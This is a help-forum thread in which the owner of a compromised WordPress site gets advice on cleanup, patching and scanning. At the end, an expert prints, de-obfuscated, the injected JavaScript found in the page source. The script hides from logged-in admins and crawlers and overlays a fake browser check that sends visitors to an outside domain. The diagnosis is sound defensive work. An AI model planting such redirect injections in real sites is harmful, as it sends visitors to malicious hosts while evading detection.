Link to home
Start Free TrialLog in
Avatar of romeiovasu
romeiovasu

asked on

php website

I have a website www.saberpoint.com. suddenly some thing happened to the word press website and the menu started showing on the top.  We came to know our site got compromised, and we are trying to fix this.  Can someone help me out to see what is wrong in the page.
Avatar of Jim Horn
Jim Horn
Flag of United States of America image

Curiosity overwhelms me ... Are you asking experts here to navigate to a site that is 'comprimised', and if so define 'comprimised' for us.
Avatar of romeiovasu
romeiovasu

ASKER

no the compromised one is got fixed.  Now we asking is there anything that we can fix the css sheet.
ASKER CERTIFIED SOLUTION
Avatar of Rob
Rob
Flag of Australia image

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
no the compromised one is got fixed
Not http://www.saberpoint.com/.  That IS still compromised

User generated image
Hi Rob,

i didnt understand what you are saying.  If you dont mind can you explain me more detail please.
Problem here is that you won't know which files have been compromised, and which port was exploited or which vulnerability. As far as I can see you have malware running on it right now which was injected via javascript vulnerabilities, and might be best taking it offline to minimize loss of data if they are harvesting information using the vulnerability.

Personally I would be tempted to build a clean new server, make sure it is patched and secured.
You could try running a rootkit scanner on it or malware sweep. ClamAV is often used to locate malware on Linux

Unfortunately my expertise does not go much beyond this, and it would be best getting a professional opinion added to resolve your issue in full.

I found some info running a free scan for vulnerabilities here

Result =
Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.script-injection.003
Sorry, just remembered you mentioned it's a WordPress site.  Are you on the latest version of WordPress?  Are all your plugins and themes up to date?  Any one of these elements could have a vulnerability that exposed your site
I agree with Maclean, you need a professional to sift through this or start from scratch on another server.   If you've got a lot of content then starting from scratch is going to be a pain.

The "malware" will most likely be in your database and injected by a malicious user so scanning your server will most likely turn up nothing.

Please refer to section 5 of my article below that has some information relating to cross site scripting and SQL/JS injection:
https://www.experts-exchange.com/articles/12871/Avoiding-mailto-and-how-to-capture-a-web-enquiry.html

I found that js script by looking at the source code of the page.
According to redbot you are using PHP/5.4.45 engine
This one has various vulnerabilities as it is behind in patch levels by about 2-3 months.

https://msisac.cisecurity.org/advisories/2015/2015-105.cfm
https://www.exploit-db.com/exploits/38123/

So I would say that the likely cause was not having patched the we server frequently.

I will leave things with Rob and others however, he seems to have a good knowledge on these problems.
Once a WordPress site has been compromised, you have to take a LOT of steps to make sure it is clean again. Maclean posted the link to Sucuri, which will scan the front-facing site for obvious vulnerabilities but there may be other, non-obvious backdoors now in your installation.  This article:

https://www.experts-exchange.com/articles/10806/Detecting-Recovering-From-and-Preventing-WordPress-Site-Hacks.html

talks about steps you can take to attempt to recover but if you are not familiar with WordPress hacks and overall security issues, pay Sucuri to clean you up.
Not fixed yet.  See line 451 (when you view source)

The code is on one line, but here I have expanded it.
function start() {
    function t(e) {
        var t = document.cookie,
            n = t.indexOf(" " + e + "=");
        n == -1 && (n = t.indexOf(e + "="));
        if (n == -1) t = null;
        else {
            n = t.indexOf("=", n) + 1;
            var r = t.indexOf(";", n);
            r == -1 && (r = t.length), t = unescape(t.substring(n, r))
        }
        return t
    }

    function n(e, t, n) {
        var r = new Date;
        r.setDate(r.getDate() + n);
        var i = escape(t) + (n == null ? "" : "; expires=" + r.toUTCString());
        document.cookie = e + "=" + i
    }

    function r() {
        return document.cookie ? document.cookie.indexOf("wordpress_logged") !== -1 || document.cookie.indexOf("wp-settings") !== -1 || document.cookie.indexOf("referrerRedirectCookie") !== -1 || document.cookie.indexOf("wordpress_test") !== -1 ? (console.log("true"), !0) : (console.log("false2"), !1) : (console.log("false1"), !1)
    }
    if (!r()) {
        n("referrerRedirectCookie", "do not redirect", 730);
        var e = navigator.userAgent;
        if (!e || e.length == 0) return;
        e = e.toLowerCase(), e.indexOf("google") == -1 && e.indexOf("bot") == -1 && e.indexOf("crawl") == -1 && hideWebSite()
    }
}

function createPopup() {
    var e = document.createElement("div");
    e.style.position = "absolute", e.style.width = "100%", e.style.height = "100%", e.style.left = 0, e.style.top = 0, e.style.backgroundColor = "white", e.style.zIndex = 99999, document.body.appendChild(e), e.onclick = function() {
        window.location = w_location
    };
    var t = document.createElement("p");
    return t.innerText = "Checking your browser before accessing " + window.location.host + "...", t.style.textAlign = "center", t.style.fontSize = "x-large", t.style.position = "relative", t.textContent = t.innerText, e.appendChild(t), e
}

function createButton() {
    var e = document.createElement("div");
    return e.style.position = "absolute", e.style.top = "20%", e.style.left = "10%", e.style.right = "10%", e.style.width = "80%", e.style.border = "1px solid black", e.style.textAlign = "center", e.style.verticalAlign = "middle", e.style.margin = "0, auto", e.style.cursor = "pointer", e.style.fontSize = "xx-large", e.style.borderRadius = "5px", e.onclick = function() {
        window.location = w_location
    }, e.onmouseover = function() {
        e.style.border = "1px solid red", e.style.color = "red"
    }, e.onmouseout = function() {
        e.style.border = "1px solid black", e.style.color = "black"
    }, e.innerText = "Continue", e.textContent = e.innerText, e
}
var w_location = "http://default72.com",
    hideWebSite = function() {
        var e = createPopup(),
            t = createButton();
        e.appendChild(t)
    },
    readyStateCheckInterval = setInterval(function() {
        if (document.readyState === "complete" || document.readyState == "interactive") clearInterval(readyStateCheckInterval), start()
    }, 10);

Open in new window